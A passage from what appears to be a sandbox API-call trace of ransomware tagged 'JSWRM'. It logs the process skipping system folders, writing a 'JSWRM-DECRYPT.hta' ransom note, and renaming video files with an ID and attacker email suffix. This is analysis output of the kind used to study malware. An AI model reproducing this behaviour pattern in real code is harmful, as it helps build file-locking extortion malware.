lpString2="windows") returned -1 [0067.822] lstrcmpiW (lpString1="en-US", lpString2="recovery") returned -1 [0067.822] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0067.822] lstrcmpiW (lpString1="en-US", lpString2="documents and settings") returned 1 [0067.822] lstrcmpiW (lpString1="en-US", lpString2="$RECYCLE.BIN") returned 1 [0067.822] lstrcmpiW (lpString1="en-US", lpString2="system volume information") returned -1 [0067.822] lstrcmpiW (lpString1="en-US", lpString2="msocache") returned -1 [0067.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0067.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0067.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0067.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0067.823] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\jswrm-decrypt.hta")) returned 0xffffffff [0067.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0067.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0067.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0067.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0067.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0067.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0067.825] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0067.826] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.826] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0067.828] CloseHandle (hObject=0x454) returned 1 [0067.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0067.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0067.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0067.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0067.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0067.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0067.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0067.828] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\jswrm-decrypt.hta")) returned 0x20 [0067.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0067.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0067.828] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dd09d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f169b67, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0067.828] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.828] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dd09d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f169b67, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.829] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.829] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.829] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a3b058, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a3b058, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x1b2d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="boxed-correct.avi", cAlternateFileName="")) returned 1 [0067.829] lstrcmpiW (lpString1="boxed-correct.avi", lpString2=".") returned 1 [0067.829] lstrcmpiW (lpString1="boxed-correct.avi", lpString2="..") returned 1 [0067.829] lstrcmpiW (lpString1="boxed-correct.avi", lpString2="...") returned 1 [0067.829] lstrcmpiW (lpString1="boxed-correct.avi", lpString2="windows") returned -1 [0067.829] lstrcmpiW (lpString1="boxed-correct.avi", lpString2="recovery") returned -1 [0067.829] lstrcmpiW (lpString1="boxed-correct.avi", lpString2="perflogs") returned -1 [0067.829] lstrcmpiW (lpString1="boxed-correct.avi", lpString2="documents and settings") returned -1 [0067.829] lstrcmpiW (lpString1="boxed-correct.avi", lpString2="$RECYCLE.BIN") returned 1 [0067.829] lstrcmpiW (lpString1="boxed-correct.avi", lpString2="system volume information") returned -1 [0067.829] lstrcmpiW (lpString1="boxed-correct.avi", lpString2="msocache") returned -1 [0067.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="boxed-correct.avi", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0067.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="boxed-correct.avi", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="boxed-correct.avi", lpUsedDefaultChar=0x0) returned 17 [0067.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="boxed-correct.avi", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0067.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="boxed-correct.avi", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="boxed-correct.avi", lpUsedDefaultChar=0x0) returned 17 [0067.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0067.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0067.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0067.829] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.830] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10086026322367456) returned 0 [0067.830] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.830] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.830] CloseHandle (hObject=0xffffffff) returned 1 [0067.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0067.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0067.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0067.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0067.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0067.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0067.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.831] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0067.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0067.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0067.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0067.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0067.831] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a612b1, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a612b1, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xbf28, dwReserved0=0x0, dwReserved1=0x0, cFileName="boxed-delete.avi", cAlternateFileName="")) returned 1 [0067.831] lstrcmpiW (lpString1="boxed-delete.avi", lpString2=".") returned 1 [0067.831] lstrcmpiW (lpString1="boxed-delete.avi", lpString2="..") returned 1 [0067.831] lstrcmpiW (lpString1="boxed-delete.avi", lpString2="...") returned 1 [0067.831] lstrcmpiW (lpString1="boxed-delete.avi", lpString2="windows") returned -1 [0067.831] lstrcmpiW (lpString1="boxed-delete.avi", lpString2="recovery") returned -1 [0067.831] lstrcmpiW (lpString1="boxed-delete.avi", lpString2="perflogs") returned -1 [0067.831] lstrcmpiW (lpString1="boxed-delete.avi", lpString2="documents and settings") returned -1 [0067.831] lstrcmpiW (lpString1="boxed-delete.avi", lpString2="$RECYCLE.BIN") returned 1 [0067.831] lstrcmpiW (lpString1="boxed-delete.avi", lpString2="system volume information") returned -1 [0067.831] lstrcmpiW (lpString1="boxed-delete.avi", lpString2="msocache") returned -1 [0067.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="boxed-delete.avi", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0067.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0067.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="boxed-delete.avi", cchWideChar=16, lpMultiByteStr=0x241010, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="boxed-delete.avi", lpUsedDefaultChar=0x0) returned 16 [0067.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="boxed-delete.avi", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0067.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0067.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="boxed-delete.avi", cchWideChar=16, lpMultiByteStr=0x240f98, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="boxed-delete.avi", lpUsedDefaultChar=0x0) returned 16 [0067.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0067.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0067.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0067.832] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.832] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10091077203909400) returned 0 [0067.832] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.832] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.832] CloseHandle (hObject=0xffffffff) returned 1 [0067.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0067.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0067.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0067.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0067.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0067.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0067.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.833] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0067.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0067.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0067.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0067.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0067.833] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a1d507, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1aad768, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1aad768, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb61e, dwReserved0=0x0, dwReserved1=0x0, cFileName="boxed-join.avi", cAlternateFileName="")) returned 1 [0067.833] lstrcmpiW (lpString1="boxed-join.avi", lpString2=".") returned 1 [0067.833] lstrcmpiW (lpString1="boxed-join.avi", lpString2="..") returned 1 [0067.833] lstrcmpiW (lpString1="boxed-join.avi", lpString2="...") returned 1 [0067.833] lstrcmpiW (lpString1="boxed-join.avi", lpString2="windows") returned -1 [0067.833] lstrcmpiW (lpString1="boxed-join.avi", lpString2="recovery") returned -1 [0067.833] lstrcmpiW (lpString1="boxed-join.avi", lpString2="perflogs") returned -1 [0067.833] lstrcmpiW (lpString1="boxed-join.avi", lpString2="documents and settings") returned -1 [0067.833] lstrcmpiW (lpString1="boxed-join.avi", lpString2="$RECYCLE.BIN") returned 1 [0067.833] lstrcmpiW (lpString1="boxed-join.avi", lpString2="system volume information") returned -1 [0067.833] lstrcmpiW (lpString1="boxed-join.avi", lpString2="msocache") returned -1 [0067.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0067.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="boxed-join.avi", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="boxed-join.avi", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="boxed-join.avi", lpUsedDefaultChar=0x0) returned 14 [0067.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0067.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0067.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="boxed-join.avi", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="boxed-join.avi", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="boxed-join.avi", lpUsedDefaultChar=0x0) returned 14 [0067.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0067.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0067.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", 